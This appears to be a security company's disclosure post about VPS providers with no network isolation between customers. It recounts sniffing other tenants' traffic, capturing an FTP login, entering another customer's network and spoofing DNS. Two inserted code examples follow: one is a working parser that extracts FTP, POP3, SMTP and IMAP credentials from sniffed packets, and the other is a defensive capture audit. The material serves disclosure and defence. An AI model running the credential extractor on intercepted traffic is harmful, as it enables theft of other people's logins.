Look at this image and answer quickly: would you allow this?
Would you let a stranger into your datacenter and connect to the network fabric?
Would you put your servers in a datacenter where strangers can walk in and connect to the network?
These questions may seem silly and the answers obvious, but what if we told you that this happens more often than you might think?
What if we told you that it is even worse, because it happens without this "hacker" having to risk their physical safety to get into a datacenter, without passing security guards, doors, access controls and surveillance cameras?
Believe us: without knowing it, many companies are putting their data, their systems and the foundation of their business on vulnerable infrastructure.
Security analysis of provider infrastructure
NETSENSOR, a Brazilian company that develops AI-based cybersecurity technologies, uses the infrastructure of the world's largest clouds and also of some local providers to reach more points of presence and, with that, deliver its services more efficiently.
However, before placing its services with a cloud or on-premises provider, the company performs a security analysis of the new provider's infrastructure. It was precisely during these security analyses that serious vulnerabilities in VPS (Virtual Private Server) providers were identified.
Such vulnerabilities allow:
Capture network traffic from other servers belonging to other companies;
Infiltrate networks to which the attacker does not belong;
Take control of the network.
Exploiting these vulnerabilities therefore breaks "all" the pillars of information security: confidentiality, integrity and availability.
To give a more accurate idea of the severity of the vulnerabilities found, we evaluated them with the most widely used independent vulnerability scoring system in the world, the CVSS (Common Vulnerability Scoring System).
This scoring system, maintained by FIRST, is the one NIST's National Vulnerability Database uses to rate the CVEs (Common Vulnerabilities and Exposures) catalogued by MITRE, and it is followed by the largest technology companies on the planet.
The system weighs several metrics and rates a vulnerability with a severity score between 0 and 10.
The vulnerability found in the providers' VPS infrastructure scores 10 under CVSS, the highest possible level of criticality.
“Base” score for severity
“Temporal” score for severity
“Environmental” score for severity
Providers in Europe, the USA and Brazil were evaluated, with an astounding 75% exploitation success rate. Considering only providers in Brazil, the success rate was 100%.
Below we disclose some of the evidence that proves the existence and exploitation of these vulnerabilities.
Taking control of the network
Analyzing the server's network settings at one of the evaluated providers, we can see that the public IP address is configured directly on the network interface; in other words, the VPS sits directly on a public subnet shared with other customers rather than behind a per-tenant private network.
Network interface settings
The server was allocated on a "/26" network, which spans 64 IP addresses, 62 of which are usable for hosts (the network and broadcast addresses are excluded). On our network, the addresses range from XXX.YYY.199.193 to XXX.YYY.199.254.
Probing for active addresses on this network, we received responses from 44 devices.
Search for active IPs on the network
Using a tool to capture traffic from the other servers connected to the same network, we received no packets, which is the expected behaviour on a switched segment: unicast traffic is delivered only to its destination.
Capture traffic from other servers (before the attack)
Once we had successfully exploited techniques to take control of the network, we began receiving packets from other servers belonging to other companies.
Capture traffic from other servers (after the attack)
Taking over network traffic from another company's server
Among the servers found, we selected XXX.YYY.199.238 as a random target.
Let's do a more targeted attack and take control of the network traffic of just that server.
For demonstration purposes, we enumerated the services present on the target and selected the FTP service, known for transmitting data, including credentials, in plain text.
Active services on the target server
To simulate a user's access, we used an external desktop to make a simple FTP connection to our target over the internet.
FTP client
On our VPS, which had taken control of the target's network traffic, we analyzed all FTP traffic to and from the victim's server.
FTP credential capture
In the contents of the network packets we can see the username and password used in the authentication attempt we simulated.
The point here is not to discuss the characteristics of the FTP protocol, but the fact that we were able to intercept the network traffic of the target server, which belongs to another company sharing the provider's infrastructure.
It is important to emphasize that NETSENSOR only proved the existence of the vulnerability and its exploitability, quickly returning control of the network traffic to the provider's legitimate infrastructure.
However, we point out that an attacker could, for example, wait for a legitimate user of the system to log in via FTP, perhaps to update the files of a web application on that server, capture the credentials and thereby gain access to the company's data and the source code of its system(s).
By exploiting other attack techniques, a criminal could even gain access to that company's entire server.
Many other exploits would be possible, such as capturing credentials for SMTP, POP3 and IMAP services when they are used without TLS, in addition to reading the data transmitted by these protocols.
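To make concrete what an on-path sniffer actually recovers from the FTP session above and from the SMTP, POP3 and IMAP variants just mentioned, here is an added example (not NETSENSOR's tooling or anything from the original article). It reassembles the client side of each session from captured TCP payloads and pulls out the logins. The capture is constructed for the example, with RFC 5737 documentation addresses standing in for the redacted XXX.YYY.* ones; in practice the segments would come from tcpdump or scapy on the interface that is seeing the other tenant's traffic.

```python
"""Plaintext credential extraction from a sniffed control channel (added example)."""
import base64
import re
from collections import defaultdict
from dataclasses import dataclass

PROTOCOL_BY_PORT = {21: "ftp", 25: "smtp", 110: "pop3", 143: "imap"}

# Constructed capture: 203.0.113.238 stands in for the redacted XXX.YYY.199.238
# target, 198.51.100.7 plays the external desktop. (src_ip, src_port, dst_ip, dst_port, payload)
SAMPLE_SEGMENTS = [
    ("198.51.100.7", 51000, "203.0.113.238", 21, b"USER webdeploy\r\n"),
    ("203.0.113.238", 21, "198.51.100.7", 51000, b"331 Please specify the password.\r\n"),
    ("198.51.100.7", 51000, "203.0.113.238", 21, b"PASS Sup3rS3cret!\r\n"),
    ("203.0.113.238", 21, "198.51.100.7", 51000, b"230 Login successful.\r\n"),
    ("198.51.100.7", 51001, "203.0.113.238", 110, b"USER alice\r\nPASS hunter2\r\n"),
    ("198.51.100.7", 51002, "203.0.113.238", 25, b"AUTH LOGIN\r\n"),
    ("203.0.113.238", 25, "198.51.100.7", 51002, b"334 VXNlcm5hbWU6\r\n"),  # "Username:"
    ("198.51.100.7", 51002, "203.0.113.238", 25, b"Ym9i\r\n"),              # "bob"
    ("203.0.113.238", 25, "198.51.100.7", 51002, b"334 UGFzc3dvcmQ6\r\n"),  # "Password:"
    ("198.51.100.7", 51002, "203.0.113.238", 25, b"cGFzc3cwcmQ=\r\n"),      # "passw0rd"
    ("198.51.100.7", 51003, "203.0.113.238", 25, b"AUTH PLAIN AGRhdmUAcXdlcnR5\r\n"),  # \0dave\0qwerty
    ("198.51.100.7", 51004, "203.0.113.238", 143, b"a001 LOGIN carol s3cret\r\n"),
]


@dataclass(frozen=True)
class Credential:
    protocol: str
    server: str
    username: str
    password: str


_USER = re.compile(r"^USER\s+(\S+)", re.I)
_PASS = re.compile(r"^PASS\s+(.+)$", re.I)
_IMAP_LOGIN = re.compile(r"^\S+\s+LOGIN\s+(\S+)\s+(\S+)", re.I)


def _b64(text):
    return base64.b64decode(text.strip()).decode("utf-8", errors="replace")


def _user_pass(proto, server, lines):
    """FTP and POP3: USER then PASS, both sent in the clear."""
    found, user = [], None
    for line in lines:
        m = _USER.match(line)
        if m:
            user = m.group(1)
            continue
        m = _PASS.match(line)
        if m and user is not None:
            found.append(Credential(proto, server, user, m.group(1)))
            user = None
    return found


def _smtp_auth(server, lines):
    """SMTP AUTH LOGIN / AUTH PLAIN: base64 is encoding, not encryption."""
    found, i = [], 0
    while i < len(lines):
        parts = lines[i].split()
        if len(parts) >= 2 and parts[0].upper() == "AUTH":
            mech = parts[1].upper()
            if mech == "LOGIN" and i + 2 < len(lines):
                # The server's 334 challenges are not in the client stream, so the
                # next two client lines are the base64 username and password.
                found.append(Credential("smtp", server, _b64(lines[i + 1]), _b64(lines[i + 2])))
                i += 3
                continue
            if mech == "PLAIN":
                # Initial response either on the AUTH line or on the following line.
                blob = parts[2] if len(parts) > 2 else next(iter(lines[i + 1:i + 2]), "")
                if blob:
                    fields = _b64(blob).split("\0")  # [authzid, authcid, password]
                    found.append(Credential("smtp", server, fields[-2], fields[-1]))
        i += 1
    return found


def _imap_login(server, lines):
    """IMAP: '<tag> LOGIN user pass' in the clear unless STARTTLS/IMAPS is used."""
    return [Credential("imap", server, m.group(1), m.group(2))
            for line in lines if (m := _IMAP_LOGIN.match(line))]


def extract_credentials(segments):
    """Reassemble client->server bytes per session and pull out the logins.

    Only the client half of each session is needed: all four protocols send the
    secret from client to server, which is exactly what a sniffer on the shared
    segment sees.
    """
    streams = defaultdict(bytearray)
    for src_ip, src_port, dst_ip, dst_port, payload in segments:
        if dst_port in PROTOCOL_BY_PORT:
            streams[(src_ip, src_port, dst_ip, dst_port)] += payload
    found = []
    for (_, _, dst_ip, dst_port), data in streams.items():
        proto = PROTOCOL_BY_PORT[dst_port]
        server = f"{dst_ip}:{dst_port}"
        lines = data.decode("utf-8", errors="replace").splitlines()
        if proto in ("ftp", "pop3"):
            found += _user_pass(proto, server, lines)
        elif proto == "smtp":
            found += _smtp_auth(server, lines)
        else:
            found += _imap_login(server, lines)
    return found


if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE_SEGMENTS):
        print(cred)
```

Running it prints five credentials, one per session. The SMTP cases are the ones that most often surprise administrators: AUTH LOGIN and AUTH PLAIN look "encoded" on the wire, but base64 is reversible by anyone, so they are no better than FTP's PASS unless the session is wrapped in TLS before authentication.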
Infiltrating other networks
For this next step, let's choose another provider.
On this other server we have the address XXX.YYY.106.81, with the same characteristic: the public IP address is configured directly on the network interface.
Network interface settings
We identified traffic from other logical networks of the provider, not involving our VPS at all, arriving at our network interface.
We can therefore conclude that there is no segmentation between the logical networks, such as a VLAN per network isolating each of them from the others.
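A customer can check for this condition on their own VPS without attacking anyone. The following added example (not NETSENSOR's tooling or anything from the original article) reproduces the /26 arithmetic from the first provider and then labels every frame of a promiscuous-mode capture by why it reached the interface, separating the article's two findings: unicast between other tenants on our own subnet, which a switch should never deliver and which is what a capture shows once the segment's traffic has been taken over, and traffic between addresses outside our subnet altogether, which means another customer's logical network shares our broadcast domain with no VLAN isolation. The frames, MACs and addresses are constructed, with RFC 5737 documentation ranges standing in for the redacted XXX.YYY.* ones; in practice the frames would come from tcpdump or scapy with the interface in promiscuous mode.

```python
"""Audit a promiscuous-mode capture for traffic a VPS should never see (added example)."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    dst_mac: str
    src_ip: str
    dst_ip: str


def usable_range(cidr):
    """First and last usable host address and their count for an interface.

    A /26 spans 64 addresses; the network and broadcast addresses are not
    assignable, leaving 62 hosts.
    """
    hosts = list(ipaddress.ip_interface(cidr).network.hosts())
    return str(hosts[0]), str(hosts[-1]), len(hosts)


def _is_group_mac(mac):
    # The least significant bit of the first octet marks multicast (and broadcast).
    return int(mac.split(":")[0], 16) & 1 == 1


def classify_frame(frame, own_cidr, own_mac):
    """Label a frame seen on the interface.

    own        - addressed to our MAC or IP: normal.
    broadcast  - L2 group address or L3 broadcast/multicast (ARP, mDNS, ...):
                 normal on any shared segment.
    neighbour  - unicast to/from another host on our own subnet that is not for
                 us: a switch should never deliver this; it is what the capture
                 shows once the segment's traffic has been redirected to us.
    foreign    - neither endpoint is on our subnet: another customer's logical
                 network is leaking into ours, so there is no VLAN separation.
    """
    iface = ipaddress.ip_interface(own_cidr)
    net = iface.network
    src, dst = ipaddress.ip_address(frame.src_ip), ipaddress.ip_address(frame.dst_ip)
    if frame.dst_mac.lower() == own_mac.lower() or dst == iface.ip:
        return "own"
    if _is_group_mac(frame.dst_mac) or dst.is_multicast or dst == net.broadcast_address:
        return "broadcast"
    if src in net or dst in net:
        return "neighbour"
    return "foreign"


def audit_capture(frames, own_cidr, own_mac):
    """Count frames per label and list the off-subnet addresses seen in foreign
    frames; those addresses identify the logical networks leaking into ours."""
    counts = {"own": 0, "broadcast": 0, "neighbour": 0, "foreign": 0}
    foreign_ips = set()
    net = ipaddress.ip_interface(own_cidr).network
    for frame in frames:
        label = classify_frame(frame, own_cidr, own_mac)
        counts[label] += 1
        if label == "foreign":
            foreign_ips.update(ip for ip in (frame.src_ip, frame.dst_ip)
                               if ipaddress.ip_address(ip) not in net)
    return counts, sorted(foreign_ips)


OWN_CIDR = "203.0.113.193/26"   # constructed; stands in for XXX.YYY.199.193/26
OWN_MAC = "52:54:00:aa:bb:01"   # constructed

# Constructed capture, as a promiscuous-mode sniffer would deliver it.
SAMPLE_FRAMES = [
    Frame(OWN_MAC, "198.51.100.7", "203.0.113.193"),               # to us
    Frame("ff:ff:ff:ff:ff:ff", "203.0.113.200", "203.0.113.255"),  # subnet broadcast
    Frame("01:00:5e:00:00:fb", "203.0.113.210", "224.0.0.251"),    # mDNS multicast
    Frame("52:54:00:aa:bb:ee", "198.51.100.7", "203.0.113.238"),   # FTP client -> .238
    Frame("52:54:00:aa:bb:fe", "203.0.113.238", "198.51.100.7"),   # .238 -> its gateway
    Frame("52:54:00:cc:dd:10", "192.0.2.20", "192.0.2.16"),        # other logical network
    Frame("52:54:00:cc:dd:fe", "192.0.2.40", "198.51.100.53"),     # other network -> resolver
]

if __name__ == "__main__":
    print(usable_range(OWN_CIDR))
    print(audit_capture(SAMPLE_FRAMES, OWN_CIDR, OWN_MAC))
```

On a correctly built provider network, a capture on an idle VPS should contain only "own" and "broadcast" frames. Any "foreign" frames mean the tenant isolation the provider promised does not exist at layer 2, and a steady stream of "neighbour" frames means either the switch is flooding or someone on the segment is already redirecting traffic.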
Capture traffic from other servers (before the attack)
We randomly chose the XXX.YYY.51.0 network as a target.
We identified that the IP ending in .15 was free on this network and created a sub-interface with that address.
Network sub-interface settings
To prove the success of the infiltration into this network, of which we should not be a part, we used traceroute to show the path taken to communicate with another IP on the network, the ".16".
As we can see, the path consisted of only 1 hop, showing that the communication happened directly at layer 2, without passing through any intermediate equipment (routers/firewalls).
Direct communication with target
Again we used a tool to capture the network traffic from the other servers connected to the network we had infiltrated, and we received no packets, which is the expected behaviour.
Capture traffic from other servers (before the attack)
Once we had again exploited the technique to take control of the network, we started receiving packets from other servers belonging to other companies.
Capture traffic from other servers (after the attack)
Besides being able to capture network traffic from other servers, breaking the "Confidentiality" pillar, we can intercept and manipulate data, also breaking the "Integrity" pillar.
In the case of DNS queries, we can intercept the requests and manipulate the responses, directing the victim to malicious destinations where we can capture credentials and data or even spread malware. Classic DNS over UDP port 53 carries no authentication of the answer, so a host that sees the query can reply before the real resolver does; only DNSSEC validation or an encrypted channel to a trusted resolver (DoT/DoH) takes this option away from an on-path attacker.
Capture DNS queries from other servers
Finally, we can simply interrupt the victim's communication, breaking the "Availability" pillar.
Conclusion
NETSENSOR advises taking every care when choosing a provider to host your data, your systems and your business.
Just as you look for good professionals to help take care of your business, to design, develop and maintain your systems, it is essential that you also look for good information security professionals to analyze and support decision making, including the choice of where you will deposit one of the most valuable assets today: your data.
It is not enough to have a great idea and develop the best solutions to meet your customers' needs; you also need to maintain the operation and availability of the business and, above all, ensure the security, reputation and credibility of your company in an increasingly competitive and demanding market.